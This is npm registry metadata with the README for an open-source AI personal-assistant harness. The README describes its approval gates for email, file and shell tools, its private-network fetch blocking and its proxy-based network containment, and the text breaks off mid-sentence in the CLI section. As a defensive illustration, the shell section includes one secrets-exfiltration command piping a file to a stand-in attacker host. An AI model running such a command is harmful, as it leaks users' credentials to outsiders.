{"_id":"@buildaharness/personal-assistant","_rev":"3-7cf5f6e5ed63076072c40bc8f0c81b1c","name":"@buildaharness/personal-assistant","dist-tags":{"latest":"0.2.1"},"versions":{"0.2.0":{"name":"@buildaharness/personal-assistant","version":"0.2.0","keywords":["ai-assistant","personal-assistant","chat-agent","agent-harness","human-in-the-loop","tool-approval","self-hosted","llm","openclaw-alternative","open-source"],"license":"Apache-2.0","_id":"@buildaharness/personal-assistant@0.2.0","maintainers":[{"name":"philiparxist","email":"development@3ivis.com"}],"homepage":"https://buildaharness.com/personal-assistant","bugs":{"url":"https://github.com/3IVIS/buildaharness/issues"},"bin":{"personal-assistant":"dist/cli.js"},"dist":{"shasum":"a62ca70e7f90e0e3a20349ab21d976110899712f","tarball":"https://registry.npmjs.org/@buildaharness/personal-assistant/-/personal-assistant-0.2.0.tgz","fileCount":98,"integrity":"sha512-pRX7n6KqGozxwF033zfImMSLc7sDsjXm0JIRlDoDVCGh/tXrsm376o+kdhJ8zV/Kd5BPDKCHimWixd8L+O7lrg==","signatures":[{"sig":"MEYCIQCljvgbqMWxqYZH/IYKfjvk4zkHYfmP3/PheIMRYY0rcwIhALxOMSjN4d5qXYLSGpkijyGa0/q8CFdRIzPlD4meFhSq","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@buildaharness%2fpersonal-assistant@0.2.0","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1488325},"type":"module","exports":{".":{"types":"./dist/index.d.ts","import":"./dist/index.js"}},"gitHead":"8a18b850d82250494c52eb472e04bb8f22ab6a92","scripts":{"cli":"tsx src/cli.ts","test":"vitest run","build":"vite build --config vite.config.lib.ts && cp src/file-tools-mcp-server.mjs dist/file-tools-mcp-server.mjs && mkdir -p dist/lexical/patterns && cp src/lexical/patterns/*.json dist/lexical/patterns/ && node -e \"const f='dist/cli.js',s=require('fs'),c=s.readFileSync(f,'utf8');if(!c.startsWith('#!'))s.writeFileSync(f,'#!/usr/bin/env node\\n'+c)\"","typecheck":"tsc --noEmit","eval:turn-intent":"tsx scripts/eval-turn-intent.ts"},"_npmUser":{"name":"philiparxist","email":"development@3ivis.com"},"repository":{"url":"git+https://github.com/3IVIS/buildaharness.git","type":"git","directory":"packages/personal-assistant"},"_npmVersion":"10.9.8","description":"An open-source AI chat assistant that runs the full 11-layer Build A Harness every turn — light for a fact lookup, and it stops for approval before it sends an email or runs a shell command. CLI, browser, and desktop.","directories":{},"_nodeVersion":"22.23.2","dependencies":{"zod":"^3.25.76","nodemailer":"^6.9.14","@buildaharness/harness":"^0.2.0","@buildaharness/runtime":"^0.2.0","@modelcontextprotocol/sdk":"^1.29.0"},"publishConfig":{"access":"public"},"_hasShrinkwrap":false,"devDependencies":{"tsx":"^4.16.0","vite":"^5.3.4","vitest":"^1.6.0","typescript":"^5.4.5","@types/node":"^20.14.0","vite-plugin-dts":"^4.5.4","@types/nodemailer":"^6.4.15"},"_npmOperationalInternal":{"tmp":"tmp/personal-assistant_0.2.0_1788509037065_0.3070197861410848","host":"s3://npm-registry-packages-npm-production"},"deprecated":"Renamed to @buildaharness/aielia — see https://www.npmjs.com/package/@buildaharness/aielia"},"0.2.1":{"name":"@buildaharness/personal-assistant","version":"0.2.1","keywords":["ai-assistant","personal-assistant","chat-agent","agent-harness","human-in-the-loop","tool-approval","self-hosted","llm","openclaw-alternative","open-source"],"license":"Apache-2.0","_id":"@buildaharness/personal-assistant@0.2.1","maintainers":[{"name":"philiparxist","email":"development@3ivis.com"}],"homepage":"https://buildaharness.com/personal-assistant","bugs":{"url":"https://github.com/3IVIS/buildaharness/issues"},"bin":{"personal-assistant":"dist/cli.js"},"dist":{"shasum":"72bd688f0eef00669abba2db6793d4daef6273f5","tarball":"https://registry.npmjs.org/@buildaharness/personal-assistant/-/personal-assistant-0.2.1.tgz","fileCount":98,"integrity":"sha512-pO3I15mSoIbJ0mNj6+Ui3Mw+DiJWrZmUD7yScsqC9IkYDLMAlYvuB9vjED6M8C8Tfz+a6f+HZPtuPdvUtVUPQw==","signatures":[{"sig":"MEQCIHAHOCG5SDyVAXyWXm1lEXgLFDnLAnEzoaUJAsLwmMN6AiA2eWBd3gTSh3sX+VHWvHXKjXJORU5IfSoquTPlueT4bA==","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"attestations":{"url":"https://registry.npmjs.org/-/npm/v1/attestations/@buildaharness%2fpersonal-assistant@0.2.1","provenance":{"predicateType":"https://slsa.dev/provenance/v1"}},"unpackedSize":1490431},"type":"module","exports":{".":{"types":"./dist/index.d.ts","import":"./dist/index.js"}},"gitHead":"4bce011cc77930b8d409557b165ace9d5113f538","scripts":{"cli":"tsx src/cli.ts","test":"vitest run","build":"vite build --config vite.config.lib.ts && cp src/file-tools-mcp-server.mjs dist/file-tools-mcp-server.mjs && mkdir -p dist/lexical/patterns && cp src/lexical/patterns/*.json dist/lexical/patterns/ && node -e \"const f='dist/cli.js',s=require('fs'),c=s.readFileSync(f,'utf8');if(!c.startsWith('#!'))s.writeFileSync(f,'#!/usr/bin/env node\\n'+c)\"","typecheck":"tsc --noEmit","eval:turn-intent":"tsx scripts/eval-turn-intent.ts"},"_npmUser":{"name":"philiparxist","email":"development@3ivis.com"},"repository":{"url":"git+https://github.com/3IVIS/buildaharness.git","type":"git","directory":"packages/personal-assistant"},"_npmVersion":"10.9.8","description":"An open-source AI chat assistant that runs the full 11-layer Build A Harness every turn — light for a fact lookup, and it stops for approval before it sends an email or runs a shell command. CLI, browser, and desktop.","directories":{},"_nodeVersion":"22.23.2","dependencies":{"zod":"^3.25.76","nodemailer":"^6.9.14","@buildaharness/harness":"^0.2.0","@buildaharness/runtime":"^0.2.0","@modelcontextprotocol/sdk":"^1.29.0"},"publishConfig":{"access":"public"},"_hasShrinkwrap":false,"devDependencies":{"tsx":"^4.16.0","vite":"^5.3.4","vitest":"^1.6.0","typescript":"^5.4.5","@types/node":"^20.14.0","vite-plugin-dts":"^4.5.4","@types/nodemailer":"^6.4.15"},"_npmOperationalInternal":{"tmp":"tmp/personal-assistant_0.2.1_1788512185799_0.13328506274849006","host":"s3://npm-registry-packages-npm-production"},"deprecated":"Renamed to @buildaharness/aielia — see https://www.npmjs.com/package/@buildaharness/aielia"}},"time":{"created":"2026-09-04T08:03:56.934Z","modified":"2026-09-18T18:38:32.023Z","0.2.0":"2026-09-04T08:03:57.272Z","0.2.1":"2026-09-04T08:56:26.014Z"},"bugs":{"url":"https://github.com/3IVIS/buildaharness/issues"},"license":"Apache-2.0","homepage":"https://buildaharness.com/personal-assistant","keywords":["ai-assistant","personal-assistant","chat-agent","agent-harness","human-in-the-loop","tool-approval","self-hosted","llm","openclaw-alternative","open-source"],"repository":{"url":"git+https://github.com/3IVIS/buildaharness.git","type":"git","directory":"packages/personal-assistant"},"description":"An open-source AI chat assistant that runs the full 11-layer Build A Harness every turn — light for a fact lookup, and it stops for approval before it sends an email or runs a shell command. CLI, browser, and desktop.","maintainers":[{"name":"philiparxist","email":"development@3ivis.com"}],"readme":"# @buildaharness/personal-assistant\n\nA general-purpose, everyday-use chat assistant that runs on the full 11-layer\nharness (`@buildaharness/harness`) every turn — light enough for \"what's the\nweather\" and consequential enough to gate \"send that email\" behind approval.\n\n## Design\n\nWhere a heavy autonomous agent decomposes an objective into a multi-task plan,\nthis assistant treats every chat message as **one objective, one task**. That\nkeeps `HarnessRuntime.run()` cheap per turn (no LLM calls inside the harness\nloop itself — it's synchronous state-machine bookkeeping) while still walking\nevery layer: World Model, Evidence, Hypothesis, Control State, Planning\n(trivial one-task graph), Execution, Verification, Recovery path, Memory\n(context compression), Learning (`ExperienceStore`), and the Reviewer Pass +\noutput validation at the end.\n\nThree things live *outside* a single harness run, deliberately:\n\n- **Conversation history** — each turn's `WorldModel`/`TaskGraph`/etc. are\n  scratch state for that turn only, the same way they are for any harness run.\n  The transcript is kept in a `MemoryAdapter` (in-memory by default; swap in\n  `IndexedDBAdapter` from `@buildaharness/runtime` for browser persistence) and\n  fed to the LLM call directly. Alongside every message appended to\n  `transcript:<sessionId>`, `PersonalAssistant` also writes a parallel,\n  individually-addressable `transcript-msg:<sessionId>:<n>` entry (an\n  `IndexedMessage` — see `assistant.ts`) so a search can resolve a hit to the\n  one exchange that matched instead of the whole session array. This index is\n  derived, not authoritative: `transcript:<sessionId>` remains the one source\n  of truth for replay/compaction/export, and index entries are never deleted\n  by `transcript-compaction.ts`, so a search can still find something that's\n  since aged out of the live (compacted) transcript window. On first\n  construction, `PersonalAssistant` also runs a one-off, idempotent\n  `backfillMessageIndex()` in the background (not awaited, so it never delays\n  the first turn) to index any transcript history that predates this feature.\n  `FileSystemAdapter.search()`, `IndexedDBAdapter.search()`, and\n  `InMemoryAdapter.search()` all funnel through the same tokenized, graduated\n  relevance scorer (`scoring.ts`'s `scoreEntries()`) and are a linear scan over\n  every stored entry, not an inverted index — fine at the message volumes a\n  single personal-use install accumulates over weeks/months, but expect it to\n  get noticeably slower after tens of thousands of messages. The `/search`\n  command (see the command table below) is the user-facing entry point:\n  `PersonalAssistant.searchTranscript()` scores every stored entry, keeps only\n  `transcript-msg:` hits, and returns them ranked, so a real match is never\n  pushed out by an unrelated non-transcript entry scoring higher.\n- **Risk classification** — `risk-classifier.ts` is a cheap keyword heuristic\n  that flags consequential requests (send/delete/pay/post/...) *before* the\n  harness — and before the one real network call — ever runs. A `HIGH` risk\n  turn returns `status: 'needs_approval'` with zero LLM calls spent; call\n  `turn(message, { approved: true })` to proceed after the caller confirms.\n- **Learning across turns** — `ExperienceStore` (strategy weights, learned\n  decompositions, recovery sequences) is in-memory by default; swap in\n  `DexieExperienceStore` from `@buildaharness/runtime` so it survives a page\n  reload.\n\n### Checkpointing and resume\n\n`HarnessRuntime.run()`/`.resume()` are async and can suspend mid-loop, yielding\na serializable `HarnessCheckpoint` after each iteration that makes task\nprogress. `PersonalAssistant` uses this to survive a crash or reload *during*\na turn, not just between them: every turn writes its checkpoint to a\n`checkpointStore` (in-memory by default; swap in `IndexedDBAdapter` for\npersistence) keyed by `turn:<sessionId>`, and deletes it once the turn\nfinishes (normally or via escalation). If `turn()` is called again for a\nsession that still has a leftover checkpoint — because the previous call never\nreached that cleanup — it resumes the interrupted harness run instead of\nsilently starting over.\n\nNet effect: one real LLM call per ordinary turn, zero for a blocked one, and\nevery layer of the harness touched on the ones that do run — matching what\n[buildaharness.com/harness-comparison](https://buildaharness.com/harness-comparison)\ncalls out as missing from Hermes Agent, Kilo Code, and OpenClaw: none of them\nships a formal Control State resolver *and* a Reviewer/output gate together.\n<!--\n  Last verified against the live page 2026-07-14: it still shows all three as\n  \"○ Not described\" for a tiered Control State resolver, and states \"0/3 ship\n  a formal output/reviewer-pass quality gate before a reply goes out.\" That\n  page is external to this repo (not vendored here), edited independently of\n  this package, and its specific figures (CVE/CVSS numbers, malicious-skill\n  counts, etc. elsewhere on the page) have already changed at least once —\n  re-check this exact claim by hand whenever the comparison page is next\n  revised, since nothing in this repo will catch it drifting silently.\n-->\n\n#### Recovering a stuck checkpoint\n\nResuming a leftover checkpoint can itself fail — most often because whatever\ncrashed the process partway through a turn crashes again identically on\nreplay. `PersonalAssistant` tracks failed resume attempts per session\n(persisted, so it survives the crash too) and, after 2 in a row for the same\ncheckpoint, discards it automatically and starts that turn fresh instead of\nretrying forever — a `checkpoint_discarded` trace event marks when this\nhappens. `clearCheckpoint(sessionId)` / `getCheckpointStatus(sessionId)` give\na caller (the CLI's `/checkpoint` / `/checkpoint clear`, see \"REPL commands\"\nbelow) an explicit, scoped way to inspect or discard a checkpoint by hand\nwithout waiting for that automatic cap, and without the collateral damage of\n`clearSession()` (`/clear`/`/new`), which also wipes the session's transcript,\nfacts, and plan — previously the only in-product recovery option, short of\nmoving `checkpointStore`'s whole backing directory aside by hand.\n\n### Memory, Knowledge, and the other four\n\n\"Memory\" gets used loosely for six conceptually different things in this\npackage. None of the underlying storage was restructured to enforce this —\nit's a naming map over the stores that already exist, added so future changes\nland in the right conceptual bucket instead of overloading whichever store is\nclosest to hand:\n\n| Tier | Answers | Where it lives |\n|---|---|---|\n| **Memory** | \"What was said?\" | `transcript:<sessionId>` — the conversation transcript (see above) |\n| **Knowledge** | \"What do we believe?\" | `UserFact` (`fact-extraction.ts`) — `facts:<sessionId>` (session-scoped) and `facts:durable` (promoted; see `DURABLE_FACTS_KEY`'s doc comment in `assistant.ts`) |\n| **Evidence** | \"Why do we believe it?\" | `UserFact.source` (`FactSource`: `user_asserted` / `model_inferred` / `observed` / `externally_verified`) — see `fact-extraction.ts`; separately, `AnswerClaim` (below) carries the same evidence-vs-claim distinction for a single turn's reply |\n| **Preference** | \"What does the user want?\" | Split across two stores today, worth distinguishing when reading either: a *stated* preference is just a `durable` `UserFact` like any other belief; a *configured* one (backend, model, `enableShell`, etc.) is `AssistantConfig` (`config.ts`) |\n| **State** | \"What's true right now?\" | `plan:<sessionId>` (`plan-store.ts`, the active task graph) plus session bookkeeping (`spend:<sessionId>`, `resume-attempts:<sessionId>`) |\n| **Experience** | \"What worked before?\" | `ExperienceStore` / `DexieExperienceStore` — strategy weights, learned decompositions, recovery sequences |\n\nReminders (`reminderStore`) sit at the State/Knowledge boundary — durable like\nKnowledge (never cleared by `clearSession()`), but describing pending intent\nrather than a belief about the world.\n\nThis table is the canonical reference the doc comments on `DURABLE_FACTS_KEY`\n(`assistant.ts`), `fact-extraction.ts`, `plan-store.ts`, and\n`DexieExperienceStore` each cross-reference — update it there rather than\nre-deriving the mapping if it changes.\n\n## Usage\n\n```ts\nimport { LLMClient } from '@buildaharness/runtime'\nimport { PersonalAssistant } from '@buildaharness/personal-assistant'\n\nconst assistant = new PersonalAssistant({\n  llmClient: new LLMClient({ proxyUrl, authToken }),\n})\n\nconst result = await assistant.turn('What time zone is Tokyo in?')\n// { status: 'ok', reply: '...', riskLevel: 'LOW', controlState: {...}, stepsUsed: 1 }\n\nconst gated = await assistant.turn('Send an email to my boss saying I quit.')\n// { status: 'needs_approval', reason: '...', riskLevel: 'HIGH' } — no LLM call made\n\nawait assistant.turn('Send an email to my boss saying I quit.', { approved: true })\n// proceeds and runs the harness normally\n```\n\nIn a browser, use `PersonalAssistant.create()` instead of `new PersonalAssistant()`\nto default transcript, learning, and checkpoint storage to their IndexedDB/Dexie-backed\nimplementations, so all three survive a page reload:\n\n```ts\nconst assistant = await PersonalAssistant.create({\n  llmClient: new LLMClient({ proxyUrl, authToken }),\n})\n```\n\n`create()` only supplies a default for storage the caller didn't already pass\nin — outside a browser it falls back to the same in-memory defaults as the\nplain constructor *unless* the caller passes its own `memory`/`experienceStore`/\n`checkpointStore`, which is exactly what the CLI and the Tauri desktop app do\n(see \"Front ends\" below) to get real persistence without either of them\nneeding a browser.\n\n## Front ends\n\nThree front ends share this one package and harness underneath — none is more\n\"real\" than the others, and each picks the storage backend that fits where it\nruns:\n\n| Front end | Where | Storage |\n|---|---|---|\n| This package's `PersonalAssistant` class | Any Node/browser code | In-memory by default; bring your own `MemoryAdapter`/`ExperienceStore` |\n| CLI (`cli.ts`, below) | Terminal | `FileSystemAdapter`/`FileSystemExperienceStore` (`@buildaharness/runtime`) over `node:fs/promises`, under `~/.buildaharness/personal-assistant/` |\n| `@buildaharness/chat-ui` | Browser | `IndexedDBAdapter`/`DexieExperienceStore` via `PersonalAssistant.create()` (best-effort — see `packages/runtime/README.md`'s persistence section) |\n| `@buildaharness/desktop` | Native window (Tauri, wraps chat-ui) | Same `FileSystemAdapter`/`FileSystemExperienceStore` classes as the CLI, but over `@tauri-apps/plugin-fs` instead of `node:fs`, under `appLocalDataDir()` |\n\nBoth filesystem backends are the *same* `FileSystemAdapter`/`FileSystemExperienceStore`\nclasses — see `packages/runtime/README.md`'s \"Filesystem-backed storage\"\nsection for how the file-I/O seam that makes that possible works.\n\nThe REPL commands below (`/clear`, `/export`, `/undo`, `/memory`, `/cost`,\n`/doctor`) have GUI equivalents in chat-ui/desktop too — a header button for\neach action, and a Settings > Diagnostics section for the read-only ones —\nreusing this package's `formatMemorySummary`/`formatCostSummary`/`formatDoctorReport`/\n`formatTranscriptMarkdown`/`estimateCostUsd` exports so both front ends render\nidentical data, never two descriptions of the same facts. See\n`packages/chat-ui/README.md`'s \"Session actions & Diagnostics\" section.\n\n## File access via tools\n\n`PersonalAssistant` can give the model real `read_file`/`list_directory`/`write_file`\ntools, scoped to a single sandboxed workspace directory, by passing a `fileTools`\noption:\n\n```ts\nconst assistant = new PersonalAssistant({\n  llmClient,\n  fileTools: { backend, workspaceRoot: '/path/to/workspace' }, // any FsBackend — node:fs/promises, @tauri-apps/plugin-fs, etc.\n})\n```\n\nAbsent by default — without it, `turn()` behaves exactly as before this option\nexisted (a single plain chat call, no tools).\n\nEvery path a tool call requests is resolved and validated against `workspaceRoot`\nbefore any I/O: `../` traversal, an absolute path outside the root, and a symlink\n*inside* the root that points outside it are all rejected (see `file-tools.ts`'s\n`resolveInWorkspace`/`assertRealPathInWorkspace`). A rejected or errored tool call\nis reported back to the model as a clear decline, never a silent no-op dressed up\nas success.\n\n**`write_file` never executes inline.** It always stages a proposal — `{ kind:\n'write', path, content, stagedAt }` — as JSON under\n`<workspaceRoot>/.pending-actions/<id>.json`, and the turn returns\n`status: 'needs_approval'` with a `pendingActionId` (and `pendingActionKind:\n'write'`), the same shape `needs_approval` already has for a HIGH-risk message,\njust triggered by the tool call itself rather than a regex over the user's\nwords (a request like \"organize my notes into a summary file\" doesn't trip the\nmessage-level risk gate, yet it performs a real write once the model decides to\ncall `write_file`). Resume it by ID rather than re-asking the model:\n\n```ts\nconst staged = await assistant.turn('Summarize this into notes.md')\n// { status: 'needs_approval', reason: '...', pendingActionId: '...', pendingActionKind: 'write' }\n\nawait assistant.turn('Summarize this into notes.md', { approved: true, pendingActionId: staged.pendingActionId })\n// applies the exact staged content directly via FsBackend — no second LLM call\n// { status: 'ok', reply: 'Wrote \"notes.md\".' }\n```\n\nDeclining (`{ approved: false, pendingActionId }`) discards the staged record\nwithout writing. A pending action left over from a crashed/abandoned turn sits\nin `.pending-actions/` indefinitely — harmless (never applied without an explicit\n`approved: true` with the matching ID) but not currently auto-swept. This same\nstaging record shape (a `kind` discriminator) is shared with `run_shell_command`\n(see \"Shell access via tools\" below) and `send_email`.\n\n### `send_email` — a real \"effect\" tool behind the gate\n\nThe flagship demo (\"send an email to my boss saying I quit\") only means\nsomething if there's an actual send behind the approval. Pass `actionTools` with\na delivery transport and the model gets a `send_email` tool staged exactly like\n`write_file` — it can only ever *propose* a recipient/subject/body; the message\nis delivered only after `{ approved: true, pendingActionId }`, through the\ninjected transport, never by the model.\n\n```ts\nimport { PersonalAssistant, createResendSender } from '@buildaharness/personal-assistant'\n// or: import { createSmtpSender } from '@buildaharness/personal-assistant'\n\nconst assistant = new PersonalAssistant({\n  llmClient,\n  actionTools: {\n    backend, workspaceRoot,\n    sendEmail: createResendSender({ apiKey: process.env.RESEND_API_KEY!, from: 'me@example.com' }),\n  },\n})\n\nconst staged = await assistant.turn('Email my boss that I quit.')\n// { status: 'needs_approval', pendingActionKind: 'email', reason: 'To: … / Subject: … / …' }\nawait assistant.turn('Email my boss that I quit.', { approved: true, pendingActionId: staged.pendingActionId })\n// delivers the exact staged message; { status: 'ok', reply: 'Sent the email to …' }\n```\n\nIn the CLI, set `enableEmail` + `emailProvider` (`resend` or `smtp`) + `emailFrom`\nand the provider credentials via `/config` or `ASSISTANT_EMAIL_*` /\n`ASSISTANT_SMTP_*` env vars. Without a transport configured, no `send_email` tool\nexists — the model can't propose what it can't be given.\n\nBoth backends enforce the same \"never write inline\" rule, by different\nmechanisms:\n\n- **Proxy/Anthropic backend** (`LLMClient`): `PersonalAssistant`'s tool loop\n  (capped at 5 iterations) calls `callChatStructured` directly, executes\n  non-mutating tool calls for real, and intercepts `write_file` itself before\n  it ever reaches `file-tools.ts`'s staging code.\n- **Claude CLI backend** (`ClaudeCliLLMClient`): Claude Code's own agentic loop\n  calls a `file-tools` MCP server (`file-tools-mcp-server.mjs`) autonomously\n  within a single `claude -p` invocation — there's no outer TS loop to\n  intercept each call, so the gate lives inside the MCP server's `write_file`\n  handler instead, which stages exactly the same `.pending-actions/<id>.json`\n  record. `ClaudeCliLLMClient` still always passes `--tools \"\"` (Claude Code's\n  own built-in Read/Write/Bash stay off) and adds `--mcp-config`,\n  `--strict-mcp-config` (ignore any ambient project `.mcp.json`), and\n  `--dangerously-skip-permissions` (headless `-p` mode has no way to answer an\n  interactive tool-permission prompt) only when `fileTools` or `shellTools` is\n  configured.\n\nv1 is deliberately read/list/write only — no delete/move tool (higher\nconsequence than a write, no \"undo\" via re-approval). One workspace root per\nassistant instance; no multi-root or per-request override. chat-ui doesn't have\na write-approval UI yet — file tools are CLI/desktop-only for now.\n\n## Web access via tools\n\n`web_search`/`fetch_url` are read-only — same trust tier as `read_file`/\n`list_directory` — so both execute for real immediately, with **no approval\nstep**, via a `webTools` option:\n\n```ts\nconst assistant = new PersonalAssistant({\n  llmClient,\n  webTools: { search: (query) => duckDuckGoSearch(query) }, // any WebSearchResult[]-returning function\n})\n```\n\n`WebToolsContext.search` has no built-in default (the caller supplies a real\nbackend, an API client, etc.) — `web-search-provider.ts` ships two ready-made\nones, wired in by the CLI when `ASSISTANT_ENABLE_WEB=1` is set (on the\n`claude-cli` backend the same two run inside the file-tools MCP server, since\nthat backend's tools can't take an injected function):\n\n- `duckDuckGoSearch` (default) — queries DuckDuckGo's HTML endpoint, no API\n  key needed (the same provider `adapter/crewai_adapter.py`'s `ddgs`-backed\n  `web_search` uses).\n- `braveSearch` — queries the [Brave Search API](https://api.search.brave.com/app/keys),\n  opt-in via `ASSISTANT_SEARCH_BACKEND=brave` plus `BRAVE_SEARCH_API_KEY`\n  (see below).\n\nBoth `web_search` and `fetch_url` results are wrapped in\n`<untrusted_external_content>` (with a warning prefix if a regex heuristic\nflags instruction-shaped text) before they reach the model — see\n`trust-tagging.ts` — since this is content the assistant does not vouch for.\n\n**`fetch_url` refuses to fetch a private, loopback, or link-local network\ntarget.** Before issuing any request it resolves the target hostname and\nrejects loopback/RFC1918-private/link-local/cloud-metadata addresses\n(`169.254.169.254` included) — re-checked on every redirect hop, since a public\nURL can 302 to a private one. A blocked target raises a `PrivateNetworkTargetError`,\nreported back to the model as a tool error, never a silent no-op. This is a\nDNS-resolution-based application check, not a network-level policy — not a\nsubstitute for a network-isolated environment if that's a hard requirement.\n\nIndependent of `fileTools`/`shellTools` — a caller can enable web access\nwithout ever exposing the filesystem or shell.\n\n## Batch research budget\n\nThe flat `maxSteps` cap that governs an ordinary chat turn (see below) doesn't\nknow the difference between a one-question turn and a turn asking for the same\nlookup across many items — a 7-item batch and a 1-item question get the same\nbudget. When `webTools` is configured, a message is *also* checked against\n`detectHomogeneousBatchList` (`batch-list-detector.ts`) before the flat loop\nstarts: a syntactically explicit list — newline/bullet/numbered lines, ≥3\nqualifying entries, name-shaped content (a capitalization-ratio heuristic, not\nan LLM call) — routes the turn through a separate, self-calibrating budget\ninstead. Anything else (open-ended discovery, free-text comma-enumeration, a\nlist already mid-`HarnessRuntime` plan run) falls straight through to the flat\nloop, unchanged.\n\nOnce triggered, `runBatchToolLoop` resolves each item in **its own bounded\nsub-loop**, never a shared pool:\n\n- **Probe phase** — the first 1–2 items (whichever leaves at least one item\n  unprobed) resolve against a generous fixed cap, and their real cost\n  calibrates a per-item budget (`trimmedAverage` of calls-per-item, floored so\n  one suspiciously cheap item can't starve the rest, with slack headroom on\n  top) for every item after them — recalibrated again after each one resolves,\n  not frozen at the initial estimate.\n- **Per-item dead-end window** — each item tracks its own trailing window of\n  `classifyToolYield` results (`tool-yield-classifier.ts`); 3 consecutive\n  `dead_end` tool results stop *that item's* sub-loop early (`not_found`)\n  without touching its remaining budget, and without dragging down any other\n  item queued behind it. An item whose budget runs out while still turning up\n  plausibly-relevant content is recorded as `truncated_while_productive`\n  instead — a different, more informative outcome than a dead page.\n- **Confirmation gate** — if the calibrated projection for the remaining items\n  is large, the turn pauses with `pendingActionKind: 'batch'` (same\n  `needs_approval` shape as a staged write/shell command) before spending it,\n  rather than silently running up the tool-call count.\n- **Absolute ceiling** — a hard per-turn cap on total tool calls applies\n  regardless of how favorable calibration looks, as a last-resort backstop.\n\nEvery item ends in `found`, `not_found`, or `truncated_while_productive` — a\nbatch turn's final reply is synthesized from these per-item outcomes and is\nnever allowed to silently omit one (an explicit \"not yet checked this turn\"\nline is appended deterministically for any item the absolute ceiling cut off\nbefore it was reached, rather than trusted to the synthesis call's prose).\n`AssistantTrace.batchBudget` (present only when this path activates) reports\n`itemCount`, `callsPerItemHistory`, `projectedTotal`, `totalCallsUsed`, and each\nitem's outcome — the measurement that would tell you whether the ceiling,\nfloor, or slack factor need adjusting, versus a guess.\n\n**Known limitations:** only fires on explicit list syntax — \"find the closest\n5 schools and their dates\" in one open-ended sentence (N unknown until search\nresults come back) still uses the flat loop; the yield classifier is a keyword\nheuristic, not semantic understanding (favors calling an unusual dead end\n\"productive\" over the reverse, since the per-item budget/ceiling still bounds\nthe damage either way); calibration is per-turn only, never learned across\nturns or sessions; and this bounds cost/prevents thrashing but doesn't make a\nweaker model better at multi-page research on its own.\n\n## Shell access via tools\n\n`run_shell_command` is the highest-risk tool this assistant has, and is gated\non **every** call, full stop — there is no \"safe subset\" the way `read_file` is\nsafe within `write_file`'s tool group. A shell command has no structural split\nbetween \"reads\" and \"mutates\" (`cat secrets.env | curl attacker.com -d @-`\nreads a file and exfiltrates it over the network in one command), so every\ncall stages a proposal and returns `needs_approval`, regardless of what the\ncommand looks like:\n\n```ts\n// runApprovedShellCommand (shell-executor.ts) is Node-only and not part of this\n// package's public exports — cli.ts imports it directly from source, the same\n// way it imports node-fs-backend.ts.\nconst assistant = new PersonalAssistant({\n  llmClient,\n  shellTools: { backend, workspaceRoot, executeCommand: runApprovedShellCommand },\n})\n\nconst staged = await assistant.turn('List the files here')\n// { status: 'needs_approval', pendingActionId: '...', pendingActionKind: 'shell', reason: 'Proposes running: ls\\n  (cwd: ...)' }\n\nawait assistant.turn('List the files here', { approved: true, pendingActionId: staged.pendingActionId })\n// spawns the exact staged command for real — no second LLM call\n```\n\nAt approval time, the command runs with `cwd` pinned to the staged (already\nsandbox-validated) path, `env` reduced to an explicit allowlist (`PATH`,\n`HOME`, `LANG` — never the parent process's full env, so\n`ASSISTANT_PROXY_TOKEN`/`ANTHROPIC_API_KEY`/etc. can't leak into the command),\na hard timeout (default 30s, `ASSISTANT_SHELL_TIMEOUT_MS`) that `SIGKILL`s the\nwhole process group on expiry, and combined stdout+stderr truncated to a byte\ncap (default 20KB). A non-zero exit code is reported normally, not thrown —\nonly a rejected `cwd` or a spawn failure throws.\n\n**Network containment (`ASSISTANT_SHELL_NETWORK_ALLOWLIST`):** the spawned\ncommand's `HTTP_PROXY`/`HTTPS_PROXY` env vars are forced to point at a\nloopback-only proxy (`network-containment.ts`) that only relays a request\nwhose target host matches an entry in `shellNetworkAllowlist` (exact match or\nsubdomain — comma-separated hostnames via the env var, e.g.\n`ASSISTANT_SHELL_NETWORK_ALLOWLIST=api.example.com,registry.npmjs.org`).\n**Undefined/empty denies all network access** from an approved shell\ncommand — the safe default, since no host is a legitimate target until the\nuser opts one in. This is a Node-level restriction, not an OS sandbox: it\nstops any tool that honors proxy env vars (`curl`, `wget`, most language HTTP\nclients) from reaching a non-allowlisted host, but does **not** stop a tool\nthat opens raw sockets and ignores those env vars entirely. That tradeoff —\nweaker than real OS-native sandboxing (Linux seccomp/landlock, macOS\n`sandbox-exec`, Windows job objects) or a container-per-command, but\nidentical across the CLI and the Tauri desktop app with no new dependency —\nis deliberate; see `plans/lexical_functions_hardening_plan.html`'s Decision 6\nfor the full comparison.\n\n**The command's output gets the same trust boundary as `fetch_url`/`web_search`.**\nOnce approved, stdout+stderr is wrapped in `<untrusted_external_content>` (with\nthe same injection-heuristic warning prefix — see `trust-tagging.ts`) before\nit's saved into the transcript: a command like `cat some-fetched-page.html` can\ncarry the same injection-shaped text a fetched web page can, and that reply\nbecomes conversation history a later turn could otherwise misread as\ninstructions.\n\n`executeCommand` is a required, injected function rather than something\n`shell-tools.ts` implements itself: `assistant.ts` is bundled into the browser\nbuild (via `index.ts`) as well as the CLI, so it never imports\n`node:child_process` directly. The real `child_process.spawn`-based\nimplementation lives in `shell-executor.ts` (mirrors `node-fs-backend.ts` —\ndeliberately not exported from this package's index; only `cli.ts` imports it).\n\nOn the Claude CLI backend, `run_shell_command` is never a Claude Code built-in:\n`ClaudeCliLLMClient` never adds `Bash` to `--tools` under any configuration\n(there's a unit test asserting this as a hard invariant) — instead it's served\nby the same MCP server as the file tools, gated behind `ENABLE_SHELL_TOOLS=1`,\nwhich only stages (never executes), exactly like `write_file`.\n\n**Known limitations:** no persistent shell session (each approved command runs\nin its own fresh subprocess — a `cd` inside one command doesn't affect the\nnext); no streaming output (only available after the process exits or times\nout). Shell access is opt-in and off by default — enabling it is a real trust\ndecision this plan makes *safe*, not *risk-free*.\n\n## CLI\n\n```bash\nASSISTANT_PROXY_URL=http://localhost:8787 ASSISTANT_PROXY_TOKEN=... npm run cli --workspace=packages/personal-assistant\n```\n\nSet `ASSISTANT_WORKSPACE_DIR` to sandbox the file tools to a specific directory\n(defaults to the CLI's current working directory, mirroring how `claude` itself\ndefaults to the launch directory):\n\n```bash\nASSISTANT_WORKSPACE_DIR=/path/to/workspace npm run cli --workspace=packages/personal-assistant\n```\n\nWhen the model calls `write_file`, the CLI prints the proposed path and 